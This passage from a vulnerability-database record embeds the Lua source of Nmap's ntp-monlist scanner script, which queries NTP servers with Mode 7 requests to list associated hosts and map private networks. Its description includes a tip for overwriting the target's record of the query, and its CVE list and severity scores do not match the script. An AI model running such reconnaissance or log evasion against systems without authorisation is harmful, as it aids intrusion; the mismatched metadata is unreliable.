"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-06-03T12:14:15", "type": "nmap", "title": "ntp-monlist NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-05T21:57:41", "id": "NMAP:NTP-MONLIST.NSE", "href": "https://nmap.org/nsedoc/scripts/ntp-monlist.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal math = require \"math\"\nlocal nmap = require \"nmap\"\nlocal packet = require \"packet\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\nauthor = \"jah\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\"}\ndescription = [[\nObtains and prints an NTP server's monitor data.\n\nMonitor data is a list of the most recently used (MRU) having NTP associations\nwith the target. Each record contains information about the most recent NTP\npacket sent by a host to the target including the source and destination\naddresses and the NTP version and mode of the packet. 
With this information it\nis possible to classify associated hosts as Servers, Peers, and Clients.\n\nA Peers command is also sent to the target and the peers list in the response\nallows differentiation between configured Mode 1 Peers and clients which act\nlike Peers (such as the Windows W32Time service).\n\nAssociated hosts are further classified as either public or private.\nPrivate hosts are those\nhaving IP addresses which are not routable on the public Internet and thus can\nhelp to form a picture about the topology of the private network on which the\ntarget resides.\n\nOther information revealed by the monlist and peers commands are the host with\nwhich the target clock is synchronized and hosts which send Control Mode (6)\nand Private Mode (7) commands to the target and which may be used by admins for\nthe NTP service.\n\nIt should be noted that the very nature of the NTP monitor data means that the\nMode 7 commands sent by this script are recorded by the target (and will often\nappear in these results). Since the monitor data is a MRU list, it is probable\nthat you can overwrite the record of the Mode 7 command by sending an innocuous\nlooking Client Mode request. This can be achieved easily using Nmap:\n<code>nmap -sU -pU:123 -Pn -n --max-retries=0 <target></code>\n\nNotes:\n* The monitor list in response to the monlist command is limited to 600 associations.\n* The monitor capability may not be enabled on the target in which case you may receive an error number 4 (No Data Available).\n* There may be a restriction on who can perform Mode 7 commands (e.g. 
\"restrict noquery\" in <code>ntp.conf</code>) in which case you may not receive a reply.\n* This script does not handle authenticating and targets expecting auth info may respond with error number 3 (Format Error).\n]]\n\n---\n-- @usage\n-- nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 123/udp open ntp udp-response\n-- | ntp-monlist:\n-- | Target is synchronised with 127.127.38.0 (reference clock)\n-- | Alternative Target Interfaces:\n-- | 10.17.4.20\n-- | Private Servers (0)\n-- | Public Servers (0)\n-- | Private Peers (0)\n-- | Public Peers (0)\n-- | Private Clients (2)\n-- | 10.20.8.69 169.254.138.63\n-- | Public Clients (597)\n-- | 4.79.17.248 68.70.72.194 74.247.37.194 99.190.119.152\n-- | ...\n-- | 12.10.160.20 68.80.36.133 75.1.39.42 108.7.58.118\n-- | 68.56.205.98\n-- | 2001:1400:0:0:0:0:0:1 2001:16d8:dd00:38:0:0:0:2\n-- | 2002:db5a:bccd:1:21d:e0ff:feb7:b96f 2002:b6ef:81c4:0:0:1145:59c5:3682\n-- | Other Associations (1)\n-- |_ 127.0.0.1 seen 1949869 times. last tx was unicast v2 mode 7\n\n-- This script uses the NTP sequence numbers and the 'more' bit found in\n-- response packets in order to determine when to stop the reception loop. It\n-- would be possible for a malicious target to tie-up this script by sending\n-- a continuous stream of UDP datagrams.\n-- Therefore MAXIMUM_EVIL has been defined to limit the number of malformed or\n-- duplicate packets that will be processed before a target is rejected and\n-- MAX_RECORDS simply limits the storage of valid looking NTP data to a sane\n-- level.\nlocal MAXIMUM_EVIL = 25\nlocal MAX_RECORDS = 1200\n\nlocal TIMEOUT = 5000 -- ms\n\n\n---\n-- ntp-monlist will run against the ntp service which only runs on UDP 123\n--\nportrule = shortport.port_or_service(123, 'ntp', {'udp'})\n\n---\n-- Send an NTPv2 Mode 7 'monlist' command to the target, receive any responses\n-- and parse records from those responses. 
If the target responds favourably\n-- then send a 'peers' command and parse the responses. Finally, categorise the\n-- discovered NTP associations (hosts) and output the interpreted results.\n--\naction = function(host, port)\n\n -- Define the request code and implementation numbers of the NTP request to\n -- send to the target.\n local REQ_MON_GETLIST_1 = 42\n local REQ_PEER_LIST = 0\n local IMPL_XNTPD = 3\n\n -- parsed records will be stored in this table.\n local records = {['peerlist'] = {}}\n\n -- send monlist command and fill the records table with the responses.\n local inum, rcode = IMPL_XNTPD, REQ_MON_GETLIST_1\n local sock = doquery(nil, host, port, inum, rcode, records)\n\n -- end here if there are zero records.\n if #records == 0 then\n if sock then sock:close() end\n return nil\n end\n\n -- send peers command and add the responses to records.peerlist.\n rcode = REQ_PEER_LIST\n sock = doquery(sock, host, port, inum, rcode, records)\n if sock then sock:close() end\n\n -- now we can interpret the collected records.\n local interpreted = interpret(records, host.ip)\n\n -- output.\n return summary(interpreted)\n\nend\n\n\n---\n-- Sends NTPv2 Mode 7 requests to the target, receives any responses and parses\n-- records from those responses.\n--\n-- @param sock Socket object which must be supplied in a connected state.\n-- nil may be supplied instead and a socket will be created.\n-- @param host Nmap host table for the target.\n-- @param port Nmap port table for the target.\n-- @param inum NTP implementation number (i.e. 0, 2 or 3).\n-- @param rcode NTP Mode 7 request code (e.g. 42 for 'monlist').\n-- @param records Table in which to store records parsed from responses.\n-- @return sock Socket object connected to the target.\n--\nfunction doquery(sock, host, port, inum, rcode, records)\n\n local target = ('%s%s%d'):format(\n host.ip, host.ip:match(':') and '.' 
or ':', port.number\n )\n records.badpkts = records.badpkts or 0\n records.peerlist = records.peerlist or {}\n\n if #records + #records.peerlist >= MAX_RECORDS then\n stdnse.debug1('MAX_RECORDS has been reached for target %s - only processing what we have already!', target)\n if sock then sock:close() end\n return nil\n end\n\n -- connect a new socket if one wasn't supplied\n if not sock then\n sock = nmap.new_socket()\n sock:set_timeout(TIMEOUT)\n local constatus, conerr = sock:connect(host, port)\n if not constatus then\n stdnse.debug1('Error establishing a UDP connection for %s - %s', target, conerr)\n return nil\n end\n end\n\n -- send\n stdnse.debug2('Sending NTPv2 Mode 7 Request %d Implementation %d to %s.', rcode, inum, target)\n local ntpData = getPrivateMode(inum, rcode)\n local sendstatus, senderr = sock:send(ntpData)\n if not sendstatus then\n stdnse.debug1('Error sending NTP request to %s:%d - %s', host.ip, port.number, senderr)\n sock:close()\n return nil\n end\n\n local track = {\n ['evil_pkts'] = records.badpkts, -- a count of bad packets\n ['hseq'] = -1, -- highest received seq number\n ['mseq'] = '|', -- missing seq numbers\n ['errcond'] = false, -- true if sock, ntp or sane response error exists\n ['rcv_again'] = false, -- true if we should receive_bytes again (more bit is set or missing seq).\n ['target'] = target, -- target ip and port\n ['v'] = 2, -- ntp version\n ['m'] = 7, -- ntp mode\n ['c'] = rcode, -- ntp request code\n ['i'] = inum -- ntp request implementation number\n }\n\n -- receive and parse\n repeat\n -- receive any response\n local rcvstatus, response = sock:receive_bytes(1)\n -- check the response\n local packet_to_parse = check(rcvstatus, response, track)\n -- parse the response\n if not track.errcond then\n local remain = parse_v2m7(packet_to_parse, records)\n if remain > 0 then\n stdnse.debug1('MAX_RECORDS has been reached while parsing NTPv2 Mode 7 Code %d responses from the target %s.', rcode, target)\n track.rcv_again = 
false\n elseif remain == -1 then\n stdnse.debug1('Parsing of NTPv2 Mode 7 implementation number %d request code %d response from %s has not been implemented.', inum, rcode, target)\n track.rcv_again = false\n end\n end\n records.badpkts = records.badpkts + track.evil_pkts\n if records.badpkts >= MAXIMUM_EVIL then\n stdnse.debug1('Had %d bad packets from %s - Not continuing with this host!', target, records.badpkts)\n sock:close()\n return nil\n end\n\n until not track.rcv_again\n\n return sock\n\nend\n\n\n---\n-- Generates an NTP Private Mode (7) request with the supplied implementation\n-- number and request code.\n--\n-- @param impl number - valid values are 0, 2 and 3 - defaults to 3\n-- @param requestCode number - defaults to 42\n-- @return String request.\n--\nfunction getPrivateMode(impl, requestCode)\n local pay\n -- udp payload is 48 bytes.\n -- For a description of Mode 7 packets see NTP source file:\n -- include/ntp_request.h\n --\n -- Flags 8bits: 0x17\n -- (Response Bit: 0, More Bit: 0, Version Number 3bits: 2, Mode 3bits: 7)\n -- Authenticated Bit: 0, Sequence Number 7bits: 0\n -- Implementation Number 8bits: e.g. 0x03 (IMPL_XNTPD)\n -- Request Code 8bits: e.g. 0x2a (MON_GETLIST_1)\n -- Err 4bits: 0, Number of Data Items 12bits: 0\n -- MBZ 4bits: 0, Size of Data Items 12bits: 0\n return string.char(\n 0x17, 0x00, impl or 0x03, requestCode or 0x2a,\n 0x00, 0x00, 0x00, 0x00\n )\n -- Data 40 Octets: 0\n .. (\"\\x00\"):rep(40)\n -- The following are optional if the Authenticated bit is set:\n -- Encryption Keyid 4 Octets: 0\n -- Message Authentication Code 16 Octets (MD5): 0\nend\n\n\n---\n-- Checks that the response from the target is a valid NTP response.\n--\n-- Starts by checking that the socket read was successful and then creates a\n-- packet object from the response (with dummy IP and UDP headers). 
Then\n-- perform checks that ensure that the response is of the expected type and\n-- length, that the records in the response are of the correct size and that\n-- the response is part of a sequence of 1 or more responses and is not a\n-- duplicate.\n--\n-- @param status boolean returned from a socket read operation.\n-- @param response string response returned from a socket operation.\n-- @param track table used for tracking a sequence of NTP responses.\n-- @return A Packet object ready for parsing or\n-- nil if the response does not pass all checks.\n--\nfunction check(status, response, track)\n\n -- check for socket error\n if not status then\n track.errcond = true\n track.rcv_again = false\n if track.rcv_again then -- we were expecting more responses\n stdnse.debug1('Socket error while reading from %s - %s', track.target, response)\n end\n return nil\n end\n\n -- reset flags\n track.errcond = false\n track.rcv_again = false\n\n -- create a packet object\n local pkt = make_udp_packet(response)\n if pkt == nil then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Failed to create a Packet object with response from %s', track.target)\n return nil\n end\n\n -- off is the start of udp payload i.e. 
NTP\n local off = 28\n\n -- NTP sanity checks\n\n local val\n\n -- NTP data must be at least 8 bytes\n val = response:len()\n if val < 8 then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Expected a response of at least 8 bytes from %s, got %d bytes.', track.target, val)\n return nil\n end\n\n -- response bit set\n if (pkt:u8(off) >> 7) ~= 1 then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Bad response from %s - did not have response bit set.', track.target)\n return nil\n end\n -- version is as expected\n val = (pkt:u8(off) >> 3) & 0x07\n if val ~= track.v then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Bad response from %s - expected NTP version %d, got %d', track.target, track.v, val)\n return nil\n end\n -- mode is as expected\n val = pkt:u8(off) & 0x07\n if val ~= track.m then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Bad response from %s - expected NTP mode %d, got %d', track.target, track.m, val)\n return nil\n end\n -- implementation number is as expected\n val = pkt:u8(off+2)\n if val ~= track.i then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Bad response from %s - expected NTP implementation number %d, got %d', track.target, track.i, val)\n return nil\n end\n -- request code is as expected\n val = pkt:u8(off+3)\n if val ~= track.c then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Bad response from %s - expected NTP request code %d got %d.', track.target, track.c, val)\n return nil\n end\n -- NTP error conditions - defined codes are not evil (bogus codes are).\n local fail, msg = false\n local err = (pkt:u8(off+4) >> 4) & 0x0f\n if err == 0 then\n -- NoOp\n elseif err == 1 then\n fail = true\n msg = 'Incompatible Implementation Number'\n elseif err == 2 then\n fail = true\n msg = 'Unimplemented Request Code'\n elseif err == 3 then\n fail = true\n msg = 
'Format Error' -- could be that auth is required - we didn't provide it.\n elseif err == 4 then\n fail = true\n msg = 'No Data Available' -- monitor not enabled or nothing in mru list.\n elseif err == 5 or err == 6 then\n fail = true\n msg = 'I don\\'t know'\n elseif err == 7 then\n fail = true\n msg = 'Authentication Failure'\n elseif err > 7 then\n fail = true\n track.evil_pkts = track.evil_pkts+1\n msg = 'Bogus Error Code!' -- should not happen...\n end\n if fail then\n track.errcond = true\n stdnse.debug1('Response from %s was NTP Error Code %d - \"%s\"', track.target, err, msg)\n return nil\n end\n\n -- length checks - the data (number of items * size of an item) should be\n -- 8 <= data <= 500 and each data item should be of correct length for the\n -- implementation and request type.\n\n -- Err 4 bits, Number of Data Items 12 bits\n local icount = pkt:u16(off+4) & 0xFFF\n -- MBZ 4 bits, Size of Data Items: 12 bits\n local isize = pkt:u16(off+6) & 0xFFF\n if icount < 1 then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Expected at least one record from %s.', track.target)\n return nil\n elseif icount*isize + 8 > response:len() then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('NTP Mode 7 response from %s has invalid count (%d) and/or size (%d) values.', track.target, icount, isize)\n return nil\n elseif icount*isize > 500 then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('NTP Mode 7 data section is larger than 500 bytes (%d) in response from %s.', icount*isize, track.target)\n return nil\n end\n\n if track.c == 42 and track.i == 3 and isize ~= 72 then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1(\n 'Expected item size of 72 bytes (got %d) for request code 42 implementation number 3 in response from %s.',\n isize, track.target\n )\n return nil\n elseif track.c == 0 and track.i == 3 and isize ~= 32 then\n track.errcond = true\n 
track.evil_pkts = track.evil_pkts+1\n stdnse.debug1(\n 'Expected item size of 32 bytes (got %d) for request code 0 implementation number 3 in response from %s.',\n isize, track.target\n )\n return nil\n end\n\n -- is the response out of sequence, a duplicate or is it peachy\n local seq = pkt:u8(off+1) & 0x7f\n if seq == track.hseq+1 then -- all good\n track.hseq = track.hseq+1\n elseif track.mseq:match(('|%d|'):format(seq)) then -- one of our missing seq#\n track.mseq:gsub(('|%d|'):format(seq), '|', 1)\n stdnse.debug3('Response from %s with sequence number %s was previously missing.', -- this never seems to happen!\n track.target, seq\n )\n elseif seq > track.hseq then -- some seq# have gone missing\n for i=track.hseq+1, seq-1 do\n track.mseq = ('%s%d|'):format(track.mseq, i)\n end\n stdnse.debug3(\n 'Response from %s was out of sequence - expected #%d but got #%d (missing:%s)',\n track.target, track.hseq+1, seq, track.mseq\n )\n track.hseq = seq\n else -- seq <= hseq !duplicate!\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1(\n 'Response from %s had a duplicate sequence number - dropping it.',\n track.target\n )\n return nil\n end\n\n -- if the more bit is set or if we have missing sequence numbers then we'll\n -- want to receive more packets after parsing this one.\n local more = (pkt:u8(off) >> 6) & 0x01\n if more == 1 then\n track.rcv_again = true\n elseif track.mseq:len() > 1 then\n track.rcv_again = true\n end\n\n return pkt\n\nend\n\n\n---\n-- Returns a Packet Object generated with dummy IP and UDP headers and the\n-- supplied UDP payload so that the payload may be conveniently parsed using\n-- packet library methods. 
The dummy headers contain the barest information\n-- needed to appear valid to packet.lua\n--\n-- @param response String UDP payload.\n-- @return Packet object or nil in case of an error.\n--\nfunction make_udp_packet(response)\n\n -- udp len\n local udplen = 8 + response:len()\n -- ip len\n local iplen = 20 + udplen\n\n -- dummy headers\n -- ip\n local dh = \"\\x45\\x00\" -- IPv4, 20-byte header, no DSCP, no ECN\n .. string.pack('>I2', iplen) -- total length\n .. \"\\x00\\x00\" -- IPID 0\n .. \"\\x40\\x00\" -- DF\n .. \"\\x40\\x11\" -- TTL 0x40, UDP (proto 17)\n .. \"\\x00\\x00\" -- checksum 0\n .. \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" -- Source, destination 0.0.0.0\n .. \"\\x00\\x00\\x00\\x00\" -- UDP source, dest port 0\n .. string.pack('>I2', udplen) -- UDP length\n .. \"\\x00\\x00\" -- UDP checksum 0\n\n return packet.Packet:new(dh .. response, iplen)\n\nend\n\n\n---\n-- Invokes parsing routines for NTPv2 Mode 7 response packets based on the\n-- implementation number and request code defined in the response.\n--\n-- @param pkt Packet Object to be parsed.\n-- @param recs Table to hold the accumulated records parsed from supplied\n-- packet objects.\n-- @return Number of records not parsed from the packet (usually zero) or\n-- -1 if the response does not have an associated parsing routine.\n--\nfunction parse_v2m7(pkt, recs)\n local off = pkt.udp_offset + 8\n local impl = pkt:u8(off+2)\n local code = pkt:u8(off+3)\n if (impl == 3 or impl == 2) and code == 42 then\n return parse_monlist_1(pkt, recs)\n elseif (impl == 3 or impl == 2) and code == 0 then\n return parse_peerlist(pkt, recs)\n else\n return -1\n end\nend\n\n\n---\n-- Parsed records from the supplied monitor list packet into the supplied table\n-- of accumulated records.\n--\n-- The supplied response packets should be NTPv2 Mode 7 implementation number 2\n-- or 3 and request code 42.\n-- The fields parsed are the source and destination IP addresses, the count of\n-- times the target has seen the 
host, the method of transmission (uni|broad|\n-- multicast), NTP Version and Mode of the last packet received by the target\n-- from the host.\n--\n-- @param pkt Packet object to extract monitor records from.\n-- @param recs A table of accumulated monitor records for storage of parsed\n-- records.\n-- @return Number of records not parsed from the packet which will be zero\n-- except when MAX_RECORDS is reached.\n--\nfunction parse_monlist_1(pkt, recs)\n\n local off = pkt.udp_offset + 8 -- beginning of NTP\n local icount = pkt:u16(off+4) & 0xFFF\n local isize = pkt:u16(off+6) & 0xFFF\n local remaining = icount\n\n off = off+8 -- beginning of data section\n\n for i=1, icount, 1 do\n if #recs + #recs.peerlist >= MAX_RECORDS then\n return remaining\n end\n local pos = off + isize * (i-1) -- beginning of item\n local t = {}\n\n -- src and dst addresses\n -- IPv4 if impl == 2 or v6 flag is not set\n if isize == 32 or pkt:u8(pos+32) ~= 1 then -- IPv4\n local saddr = ipOps.str_to_ip(pkt:raw(pos+16, 4))\n local daddr = ipOps.str_to_ip(pkt:raw(pos+20, 4))\n t.saddr = saddr\n t.daddr = daddr\n else -- IPv6\n local saddr = {}\n for j=40, 54, 2 do\n saddr[#saddr+1] = stdnse.tohex(pkt:u16(pos+j))\n end\n t.saddr = table.concat(saddr, ':')\n local daddr = {}\n for j=56, 70, 2 do\n daddr[#daddr+1] = stdnse.tohex(pkt:u16(pos+j))\n end\n t.daddr = table.concat(daddr, ':')\n end\n\n t.count = pkt:u32(pos+12)\n t.flags = pkt:u32(pos+24)\n -- I've seen flags be wrong-endian just once. why? 
I really don't know.\n -- Some implementations are not doing htonl for this field?\n if t.flags > 0xFFFFFF then\n -- only concerned with the high order byte\n t.flags = t.flags >> 24\n end\n t.mode = pkt:u8(pos+30)\n t.version = pkt:u8(pos+31)\n recs[#recs+1] = t\n remaining = remaining -1\n end\n\n return remaining\nend\n\n\n---\n-- Parsed records from the supplied peer list packet into the supplied table of\n-- accumulated records.\n--\n-- The supplied response packets should be NTPv2 Mode 7 implementation number 2\n-- or 3 and request code 0.\n-- The fields parsed are the source IP address and the peer information flag.\n--\n-- @param pkt Packet object to extract peer records from.\n-- @param recs A table of accumulated monitor and peer records for storage of\n-- parsed records.\n-- @return Number of records not parsed from the packet which will be zero\n-- except when MAX_RECORDS is reached.\n--\nfunction parse_peerlist(pkt, recs)\n\n local off = pkt.udp_offset + 8 -- beginning of NTP\n local icount = pkt:u16(off+4) & 0xFFF\n local isize = pkt:u16(off+6) & 0xFFF\n local remaining = icount\n\n off = off+8 -- beginning of data section\n\n for i=0, icount-1, 1 do\n if #recs + #recs.peerlist >= MAX_RECORDS then\n return remaining\n end\n local pos = off + (i * isize) -- beginning of item\n local t = {}\n\n -- src address\n -- IPv4 if impl == 2 or v6 flag is not set\n if isize == 8 or pkt:u8(pos+8) ~= 1 then\n local saddr = ipOps.str_to_ip(pkt:raw(pos, 4))\n t.saddr = saddr\n else -- IPv6\n local saddr = {}\n for j=16, 30, 2 do\n saddr[#saddr+1] = stdnse.tohex(pkt:u16(pos+j))\n end\n t.saddr = table.concat(saddr, ':')\n end\n\n t.flags = pkt:u8(pos+7)\n table.insert(recs.peerlist, t)\n remaining = remaining -1\n end\n\n return remaining\nend\n\n\n---\n-- Interprets the supplied records to discover information about the target\n-- NTP associations.\n--\n-- Associations are categorised as NTP Servers, Peers and Clients based on the\n-- Mode of packets sent to the 
target. Alternative target interfaces are\n-- recorded as well as the transmission mode of packets sent to the target (i.e.\n-- unicast, broadcast or multicast).\n--\n-- @param recs A table of accumulated monitor and peer records for storage\n-- of parsed records.\n-- @param targetip String target IP address (e.g. host.ip)\n-- @return Table of interpreted results with fields such as servs, clients,\n-- peers, ifaces etc.\n--\nfunction interpret(recs, targetip)\n local txtyp = {\n ['1'] = 'unicast',\n ['2'] = 'broadcast',\n ['4'] = 'multicast'\n }\n local t = {}\n t.servs = {['pub']={['4']={},['6']={}}, ['prv']={['4']={},['6']={}}}\n t.peers = {['pub']={['4']={},['6']={}}, ['prv']={['4']={},['6']={}}}\n t.porc = {['pub']={['4']={},['6']={}}, ['prv']={['4']={},['6']={}}}\n t.clients = {['pub']={['4']={},['6']={}}, ['prv']={['4']={},['6']={}}}\n t.casts = {['b']={['4']={},['6']={}}, ['m']={['4']={},['6']={}}}\n t.ifaces = {['4']={},['6']={}}\n t.other = {}\n t.sync = ''\n if #recs.peerlist > 0 then\n t.have_peerlist = true\n recs.peerhash = {}\n for _, peer in ipairs(recs.peerlist) do\n recs.peerhash[peer.saddr] = peer\n end\n else\n t.have_peerlist = false\n end\n\n for _, r in ipairs(recs) do\n local vis = ipOps.isPrivate(r.saddr) and 'prv' or 'pub'\n local af = r.saddr:match(':') and '6' or '4'\n\n -- is the host a client, peer, server or other?\n if r.mode == 3 then\n table.insert(t.clients[vis][af], r.saddr)\n elseif r.mode == 4 then\n table.insert(t.servs[vis][af], r.saddr)\n elseif r.mode == 2 then\n table.insert(t.peers[vis][af], r.saddr)\n elseif r.mode == 1 then\n\n -- if we have a list of peers we can distinguish between mode 1 peers and\n -- mode 1 peers that are really clients (i.e. 
not configured as peers).\n if t.have_peerlist then\n if recs.peerhash[r.saddr] then\n table.insert(t.peers[vis][af], r.saddr)\n else\n table.insert(t.clients[vis][af], r.saddr)\n end\n else\n table.insert(t.porc[vis][af], r.saddr)\n end\n\n elseif r.mode == 5 then\n table.insert(t.servs[vis][af], r.saddr)\n else\n local tx = tostring(r.flags)\n table.insert(\n t.other,\n ('%s%s seen %d time%s. last tx was %s v%d mode %d'):format(\n r.saddr, _ == 1 and ' (You?)' or '', r.count,\n r.count > 1 and 's' or '',\n txtyp[tx] or tx, r.version, r.mode\n )\n )\n end\n\n local function isLoopback(addr)\n if addr:match(':') then\n if ipOps.compare_ip(addr, 'eq', '::1') then return true end\n elseif addr:match('^127') then\n return true\n end\n return false\n end\n\n -- destination addresses are target interfaces or broad/multicast addresses.\n if not isLoopback(r.daddr) then\n if r.flags == 1 then\n t.ifaces[af][r.daddr] = r.daddr\n elseif r.flags == 2 then\n t.casts.b[af][r.daddr] = r.daddr\n elseif r.flags == 4 then\n t.casts.m[af][r.daddr] = r.daddr\n else -- shouldn't happen\n stdnse.debug1(\n 'Host associated with %s had transmission flag value %d - Strange!',\n targetip, r.flags\n )\n end\n end\n\n end -- for\n\n local function isTarget(addr, target)\n local targ_af = target:match(':') and 6 or 4\n local test_af = addr:match(':') and 6 or 4\n if test_af ~= targ_af then return false end\n if targ_af == 4 and addr == target then return true end\n if targ_af == 6\n and (ipOps.compare_ip(addr, 'eq', target)) then return true end\n return false\n end\n\n -- reorganise ifaces and casts tables\n local _ = {}\n for k, v in pairs(t.ifaces['4']) do\n if not isTarget(v, targetip) then\n _[#_+1] = v\n end\n end\n t.ifaces['4'] = _\n _ = {}\n for k, v in pairs(t.ifaces['6']) do\n if not isTarget(v, targetip) then\n _[#_+1] = v\n end\n end\n t.ifaces['6'] = _\n _ = {}\n for k, v in pairs(t.casts.b['4']) do\n _[#_+1] = v\n end\n t.casts.b['4'] = _\n _ = {}\n for k, v in 
pairs(t.casts.b['6']) do\n _[#_+1] = v\n end\n t.casts.b['6'] = _\n _ = {}\n for k, v in pairs(t.casts.m['4']) do\n _[#_+1] = v\n end\n t.casts.m['4'] = _\n _ = {}\n for k, v in pairs(t.casts.m['6']) do\n _[#_+1] = v\n end\n t.casts.m['6'] = _\n\n -- Single out the server to which the target is synched.\n -- Note that this server may not even appear in the monlist - it depends how\n -- busy the server is.\n if t.have_peerlist then\n for _, peer in ipairs(recs.peerlist) do\n if (peer.flags & 0x2) == 0x2 then\n t.sync = peer.saddr\n if peer.saddr:match('^127') then -- always IPv4, never IPv6!\n t.sync = t.sync .. ' (reference clock)'\n end\n break\n end\n end\n end\n\n return t\n\nend\n\n\n---\n-- Outputs the supplied table of interpreted records.\n--\n-- @param t Table of interpreted records as returned from interpret().\n-- @return String script output.\n--\nfunction summary(t)\n\n local o = {}\n local count = 0\n local vbs = nmap.verbosity()\n\n -- Target is Synchronised with:\n if t.sync ~= '' then\n table.insert(o, ('Target is synchronised with %s'):format(t.sync))\n end\n\n -- Alternative Target Interfaces\n if #t.ifaces['4'] > 0 or #t.ifaces['6'] > 0 then\n table.insert(o,\n {\n ['name'] = 'Alternative Target Interfaces:',\n output_ips(t.ifaces)\n }\n )\n end\n\n -- Target listens to Broadcast Addresses\n if #t.casts.b['4'] > 0 or #t.casts.b['6'] > 0 then\n table.insert(o,\n {\n ['name'] = 'Target listens to Broadcast Addresses:',\n output_ips(t.casts.b)\n }\n )\n end\n\n -- Target listens to Multicast Addresses\n if #t.casts.m['4'] > 0 or #t.casts.m['6'] > 0 then\n table.insert(o,\n {\n ['name'] = 'Target listens to Multicast Addresses:',\n output_ips(t.casts.m)\n }\n )\n end\n\n -- Private Servers\n count = #t.servs.prv['4']+#t.servs.prv['6']\n if count > 0 or vbs > 1 then\n table.insert(o,\n {\n ['name'] = ('Private Servers (%d)'):format(count),\n output_ips(t.servs.prv)\n }\n )\n end\n -- Public Servers\n count = #t.servs.pub['4']+#t.servs.pub['6']\n if 
count > 0 or vbs > 1 then\n table.insert(o,\n {\n ['name'] = ('Public Servers (%d)'):format(count),\n output_ips(t.servs.pub)\n }\n )\n end\n\n -- Private Peers\n count = #t.peers.prv['4']+#t.peers.prv['6']\n if count > 0 or vbs > 1 then\n table.insert(o,\n {\n ['name'] = ('Private Peers (%d)'):format(count),\n output_ips(t.peers.prv)\n }\n )\n end\n -- Public Peers\n count = #t.peers.pub['4']+#t.peers.pub['6']\n if count > 0 or vbs > 1 then\n table.insert(o,\n {\n ['name'] = ('Public Peers (%d)'):format(count),\n output_ips(t.peers.pub)\n }\n )\n end\n\n -- Private Peers or Clients\n count = #t.porc.prv['4']+#t.porc.prv['6']\n if not t.have_peerlist and (count > 0 or vbs > 1) then\n table.insert(o,\n {\n ['name'] = ('Private Peers or Clients (%d)'):format(count),\n output_ips(t.porc.prv)\n }\n )\n end\n -- Public Peers or Clients\n count = #t.porc.pub['4']+#t.porc.pub['6']\n if not t.have_peerlist and (count > 0 or vbs > 1) then\n table.insert(o,\n {\n ['name'] = ('Public Peers or Clients (%d)'):format(count),\n output_ips(t.porc.pub)\n }\n )\n end\n\n -- Private Clients\n count = #t.clients.prv['4']+#t.clients.prv['6']\n if count > 0 or vbs > 1 then\n table.insert(o,\n {\n ['name'] = ('Private Clients (%d)'):format(count),\n output_ips(t.clients.prv)\n }\n )\n end\n -- Public Clients\n count = #t.clients.pub['4']+#t.clients.pub['6']\n if count > 0 or vbs > 1 then\n table.insert(o,\n {\n ['name'] = ('Public Clients (%d)'):format(count),\n output_ips(t.clients.pub)\n }\n )\n end\n\n -- Other\n count = #t.other\n if count > 0 then\n table.insert(o,\n {\n ['name'] = ('Other Associations (%d)'):format(count),\n t.other\n }\n )\n end\n\n return stdnse.format_output(true, o)\n\nend\n\n\n---\n-- Sorts and combines a set of IPv4 and IPv6 addresses into a table of rows.\n-- IPv4 addresses are ascending-sorted numerically and arranged in four columns\n-- and IPv6 appear in subsequent rows, sorted and arranged to fit as many\n-- addresses into a row as possible without the 
need for wrapping.\n--\n-- @param t Table containing two subtables indexed as '4' and '6' containing\n-- a list of IPv4 and IPv6 addresses respectively.\n-- @return Table where each entry is a row of sorted and arranged IP addresses.\n--\nfunction output_ips(t)\n\n if #t['4'] < 1 and #t['6'] < 1 then return nil end\n\n local o = {}\n\n -- sort and tabulate IPv4 addresses\n table.sort(t['4'], function(a,b) return ipOps.compare_ip(a, \"lt\", b) end)\n local limit = #t['4']\n local cols = 4\n local rows = math.ceil(limit/cols)\n local numlast = limit - cols*rows + cols\n local pad4 = (' '):rep(15)\n local index = 0\n for c=1, cols, 1 do\n for r=1, rows, 1 do\n if r == rows and c > numlast then break end\n index = index+1\n o[r] = o[r] or ''\n local padlen = pad4:len() - t['4'][index]:len()\n o[r] = ('%s%s%s '):format(o[r], t['4'][index], pad4:sub(1, padlen))\n end\n end\n\n -- IPv6\n -- Rows are allowed to be 71 chars wide\n table.sort(t['6'], function(a,b) return ipOps.compare_ip(a, \"lt\", b) end)\n local i = 1\n local limit = #t['6']\n while i <= limit do\n local work = {}\n local len = 0\n local j = i\n repeat\n 